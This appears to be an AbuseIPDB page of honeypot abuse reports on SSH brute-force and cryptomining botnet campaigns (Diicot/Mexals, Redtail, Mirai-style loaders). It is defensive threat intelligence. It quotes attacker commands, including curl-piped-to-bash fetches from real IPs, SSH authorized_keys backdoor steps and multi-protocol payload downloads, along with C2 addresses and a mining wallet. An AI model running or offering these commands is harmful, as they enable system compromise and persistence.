Repeated unauthorized SSH access + malicious script deployment, seen on an SSH honeypot across 18 co ...
show moreRepeated unauthorized SSH access + malicious script deployment, seen on an SSH honeypot across 18 connections / 17 sessions, 2026-07-29 to 2026-08-01 UTC.
Logs in as root (credential "tequiero", client "SSH-2.0-OpenSSH_9.6p1"), SCPs a Perl script to /var/tmp/clamav.pl -- masquerading as antivirus -- then runs and deletes it:
scp -t /var/tmp/clamav.pl
perl /var/tmp/clamav.pl 2>/dev/null; rm -rf /var/tmp/clamav.pl
Script SHA-256 3e7f7cdc5b44a7a47be3043847b0efe51a6c37fca4b9c2770aa305c1ba3a5927. From the captured source it: unlink($0)s itself on start to frustrate forensics; searches the whole filesystem for credential-harvest files (vuln.txt, trueusers.txt, cracked.txt, sparte.txt, gasite.txt, su-goods.txt); copies findings to /var/tmp/quWhdys/; then DELETES the originals from the host.
Destructive -- it removes data after copying it. Repeated 07-29, 07-30 (x3), 07-31, 08-01; ongoing.
Automated honeypot report. No response required.
show less
SSH intrusion + multi-architecture malware deployment, seen on an SSH honeypot across 16 connections ...
show moreSSH intrusion + multi-architecture malware deployment, seen on an SSH honeypot across 16 connections, 2026-07-18 to 2026-08-02 UTC.
Credential guessing across visits (admin/password, root/abc, root/test1234), client "SSH-2.0-Go". After login it stages a script set and installs SSH key persistence:
chmod +x setup.sh; sh setup.sh; rm -rf setup.sh;
mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EA..."
Payloads delivered (SHA-256 prefix): setup.sh 31d4181843b1ed10, clean.sh 197c74408e15bd11, redtail.arm7 f3a8ffee82d63d28, redtail.arm8 8ec920a35a7c6dd6, redtail.i686 a485511f190cca50, redtail.riscv e981d296a7034bc0, redtail.x86_64 a531f3e6224862ab.
The arm7/arm8/riscv/i686/x86_64 spread indicates indiscriminate IoT/embedded targeting; clean.sh evicts competing miners and filters crontab/.bashrc. Same payload set re-delivered on repeat visits; ongoing as of 2026-08-02.
Automated honeypot report. No response required.
show less
High-interaction SSH honeypot capture 2026-07-18 (dedicated research sensor). This
host connected 76 ...
show moreHigh-interaction SSH honeypot capture 2026-07-18 (dedicated research sensor). This
host connected 760+ times in ~2 hours and ran the Diicot/Mexals playbook: a sudo
credential loop (password "1q2w3e4r") for privilege escalation, then deployed malware.
It installed an SSH backdoor key (authorized_keys comment "ElPatrono1337") and dropped
a loader that fetches a second stage via curl 195.24.237.240/.x/black3 piped to bash
(fallback digital.digitaldatainsights.org), staging two UPX-packed x86-64 ELF payloads
in /var/tmp (loader sha256
8f225e59f3b892c7ed440db4c913491f825ccd64792cb759b55563c1b1310ece). Matches the
Diicot/Mexals cryptomining botnet (MalwareBazaar: CoinMiner/Diicot/Mexals/spreader).
Part of a persistent GPU-hunting campaign from 91.92.40.0/24 (siblings .239/.240
previously reported). Contained, no egress. Automated. No production systems involved.
Categories: Hacking, Brute-Force, Exploited Host, SSH.
show less
High-interaction SSH honeypot capture (dedicated research sensor). This host connected ~1,750 times ...
show moreHigh-interaction SSH honeypot capture (dedicated research sensor). This host connected ~1,750 times over three days (2026-07-14 to 2026-07-16), roughly every 3 minutes, running a Mirai/Gafgyt-style busybox loader: telnet-style "enable/system/shell/sh", writable-directory probing (">/tmp/.andromedatest && cd /tmp/" across /tmp /var /dev /mnt /etc /bin /boot /usr and others), busybox payload staging (cp /bin/busybox; chmod 777), and multi-protocol payload retrieval (ftpget/wget/curl/tftp) of ftpget.sh/wget.sh/curl.sh from 205.237.110.232 — self-identifying via the "ANDROMEDA" echo marker. The variant also ran GPU-detection probes (nvidia-smi -q | grep "Product Name"; nvidia-smi | grep "Tesla V100S"). Automated, non-interactive; no production systems involved; contained (no egress).
Categories: Hacking, Brute-Force, Exploited Host (botnet node), SSH.
show less
High-interaction SSH honeypot capture 2026-07-15 (dedicated research sensor). This host
authenticate ...
show moreHigh-interaction SSH honeypot capture 2026-07-15 (dedicated research sensor). This host
authenticated then deployed malware as part of an automated SSH "GPU-hunting" campaign:
it ran host/GPU fingerprinting, escalated with sudo password "1q2w3e4r" (with a
plain-shell fallback), uploaded a static x86-64 ELF loader via SFTP to /root/.16 (sha256
d16ac2d831efdd58955ab62b8c52af1dfcd800e6074a3269b07be4b8af3e8bfa) and executed it. The
loader (elf.xmrig, "project0" family) beaconed to C2 5.189.149.171:80 (contained — no
egress). This Contabo-hosted host is a deploying node for the project0 campaign and a
repeat offender against this sensor. Automated, non-interactive. No production systems
involved.
Categories: Hacking, Exploited Host, SSH.
show less
High-interaction SSH honeypot capture 2026-07-15 (dedicated research sensor). This
host connected 70 ...
show moreHigh-interaction SSH honeypot capture 2026-07-15 (dedicated research sensor). This
host connected 700+ times over ~80 minutes and, after a scripted host/GPU fingerprint
(nvidia-smi, lspci, curl ipinfo.io/org), ran a sudo credential loop (passwords
"Aa123456", "123qwerty") to validate privilege escalation, then deployed malware: it
uploaded a packed static x86-64 ELF loader via SCP to /var/tmp (sha256
07b9702bc859227a658903d1b4cf85d9daed6e0c24e670332c83020cc0a37166) and a miner to /tmp
(sha256 640c817722a4cd22251fcff100fdba167b7dfff885f36b5f64f2d59c52514180), killed
competing miners, ran `chattr -iae ~/.ssh/authorized_keys`, and executed the loader.
Signatures match the Diicot/Mexals cryptomining botnet. The loader beaconed to C2
34.117.59.81:80 (contained — no egress). Part of a persistent GPU-hunting campaign
from 91.92.40.0/24 (sibling hosts .5/.28/.29/.233/.237/.240 seen on this sensor).
Automated, non-interactive. No production systems involved.
Categories: Hacking, Brute-Force, Exploited Host, SSH.
show less
SSH honeypot capture (dedicated research sensor). This host connected repeatedly to
our SSH service ...
show moreSSH honeypot capture (dedicated research sensor). This host connected repeatedly to
our SSH service and, after a scripted system fingerprint, ran a credential
brute-force loop attempting privilege escalation with a dictionary of common
passwords (123456, password, admin, toor, 12345, 123456789) via `sudo -S`.
It is part of a persistent GPU-hunting botnet campaign originating from 91.92.40.0/24
(sibling hosts .5, .29, .28, .233, .237 observed on the same sensor): the client
(SSH-2.0-Go) enumerates CPU/GPU (lspci), verifies interactive shell command
execution, then brute-forces sudo before attempting to stage a cryptomining payload.
No successful compromise — this is a honeypot; no production systems are involved.
Observed 2026-07-14, 8 connections over ~13 minutes. Automated, non-interactive.
Categories: Hacking, Brute-Force, Exploited Host, SSH.
show less
XMRig Monero cryptominer C2. A GPU-gated XMRig payload captured by an SSH honeypot on 2026-07-13 (sh ...
show moreXMRig Monero cryptominer C2. A GPU-gated XMRig payload captured by an SSH honeypot on 2026-07-13 (sha256 d16ac2d831efdd58955ab62b8c52af1dfcd800e6074a3269b07be4b8af3e8bfa) beaconed this Contabo host on tcp/80. Not a public mining pool; associated with C2 domain endpoint.project0.cc. Payload mines Monero to wallet 89PNDJssF3RbL6m7aSydYB4tLrvjZ28Cr8n4LucmFHat8botWkWr6oDPEaSHfeZn4wfA3dC5QsE7nZV1P6tE81sK2i9heam via supportxmr.
show less
High-interaction SSH honeypot capture 2026-07-13. This host authenticated then deployed malware as p ...
show moreHigh-interaction SSH honeypot capture 2026-07-13. This host authenticated then deployed malware as part of an automated SSH "GPU-hunting" campaign: ran host/GPU fingerprinting, attempted privilege escalation with sudo password "1q2w3e4r", uploaded a static x86-64 ELF via SFTP (sha256 d16ac2d831efdd58955ab62b8c52af1dfcd800e6074a3269b07be4b8af3e8bfa) and executed it. The payload beaconed to C2 5.189.149.171:80. GPU-hunter botnet node.
show less
HackingBrute-ForceExploited HostSSH
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.